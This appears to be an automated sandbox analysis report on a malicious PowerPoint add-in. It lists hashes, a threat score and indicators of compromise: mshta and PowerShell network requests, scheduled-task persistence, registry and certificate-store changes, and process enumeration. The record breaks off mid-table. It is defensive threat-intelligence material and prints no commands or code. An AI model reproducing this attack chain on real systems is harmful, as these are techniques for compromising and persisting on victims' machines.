670e6cfe8ffded59575d5770f5685f2be005bd4352a9687b860282d4258a4cf7

Analysis

max time kernel
68s
max time network
113s
platform
windows7_x64
resource
win7v20210408
submitted
10-08-2021 06:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

13,pdf.ppam
Size

8KB
MD5

442e555300c8fc9f23d2541b50cd5683
SHA1

44ced2fda2806966ac9cb596959d75c9da9929f6
SHA256

670e6cfe8ffded59575d5770f5685f2be005bd4352a9687b860282d4258a4cf7
SHA512

dd30dd89e8cbeace09434827799aef747b747bb83315d746ce8410da34620a6bac35981ff02c86d3dbd51ce9801b8d9a610290ac3c7c2b1fe9497614e67d5a26

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 24 IoCs

Processes:

mshta.exepowershell.exepowershell.exe

flow	pid	process
7	260	mshta.exe
9	260	mshta.exe
11	260	mshta.exe
13	260	mshta.exe
15	260	mshta.exe
17	260	mshta.exe
19	260	mshta.exe
21	260	mshta.exe
23	260	mshta.exe
24	260	mshta.exe
29	260	mshta.exe
30	260	mshta.exe
31	260	mshta.exe
32	260	mshta.exe
33	260	mshta.exe
34	260	mshta.exe
35	260	mshta.exe
37	260	mshta.exe
39	1972	powershell.exe
40	1972	powershell.exe
42	896	powershell.exe
43	896	powershell.exe
44	1972	powershell.exe
47	896	powershell.exe

Drops file in System32 directory 11 IoCs

Processes:

OUTLOOK.EXEpowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\system32\perfh009.dat	OUTLOOK.EXE
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\SysWOW64\PerfStringBackup.TMP	OUTLOOK.EXE
File opened for modification	C:\Windows\SysWOW64\PerfStringBackup.INI	OUTLOOK.EXE
File created	C:\Windows\system32\perfc009.dat	OUTLOOK.EXE
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 4 IoCs

Processes:

OUTLOOK.EXEDism.exe

description	ioc	process
File created	C:\Windows\inf\Outlook\outlperf.h	OUTLOOK.EXE
File opened for modification	C:\Windows\inf\Outlook\outlperf.h	OUTLOOK.EXE
File created	C:\Windows\inf\Outlook\0009\outlperf.ini	OUTLOOK.EXE
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

520 schtasks.exe

pid	process
520	schtasks.exe

Modifies Internet Explorer settings 1 TTPs 10 IoCs

adware spyware

Modify Registry

T1112

Processes:

POWERPNT.EXEmshta.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	POWERPNT.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	POWERPNT.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	POWERPNT.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	POWERPNT.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar	POWERPNT.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt	POWERPNT.EXE

Modifies registry class 64 IoCs

Processes:

OUTLOOK.EXEPOWERPNT.EXE

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672DE-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063005-0000-0000-C000-000000000046}	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630CC-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063047-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934DA-5A91-11CF-8700-00AA0060263B}\ = "DiagramNodes"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A7A-F07E-4CA4-AF6F-BEF486AA4E6F}\ = "Trendlines"	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}	POWERPNT.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630C6-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006F025-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063002-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006302D-0000-0000-C000-000000000046}	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493471-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934C7-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E9-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630FC-0000-0000-C000-000000000046}	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630F2-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630ED-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348D-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348E-5A91-11CF-8700-00AA0060263B}\ = "PlaySettings"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A61-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A6E-F07E-4CA4-AF6F-BEF486AA4E6F}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934C7-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934D7-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A7A-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E550-4FF5-48F4-8215-5505F990966F}\ = "MediaFormat"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348C-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348E-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493498-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149349D-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630D1-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063098-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672E0-0000-0000-C000-000000000046}\ = "OlkCommandButtonEvents"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630E6-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630E8-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630E7-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493487-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A68-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672F5-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063040-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934C6-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A6F-F07E-4CA4-AF6F-BEF486AA4E6F}\ = "LegendEntries"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E550-4FF5-48F4-8215-5505F990966F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063077-0000-0000-C000-000000000046}\ = "ItemsEvents"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063075-0000-0000-C000-000000000046}\ = "OutlookBarShortcut"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493466-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672E6-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672F7-0000-0000-C000-000000000046}	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672FB-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063021-0000-0000-C000-000000000046}	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006303E-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630D4-0000-0000-C000-000000000046}\ = "_AssignToCategoryRuleAction"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063022-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493478-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E5-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A70-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents"	POWERPNT.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630B0-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063074-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348B-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493499-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

mshta.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	mshta.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b0b000000010000001600000047006c006f00620061006c005300690067006e0000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802020f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 190000000100000010000000a823b4a20180beb460cab955c24d7e210f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	mshta.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

POWERPNT.EXEOUTLOOK.EXE

pid process

1028 POWERPNT.EXE
768 OUTLOOK.EXE

pid	process
1028	POWERPNT.EXE
768	OUTLOOK.EXE

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
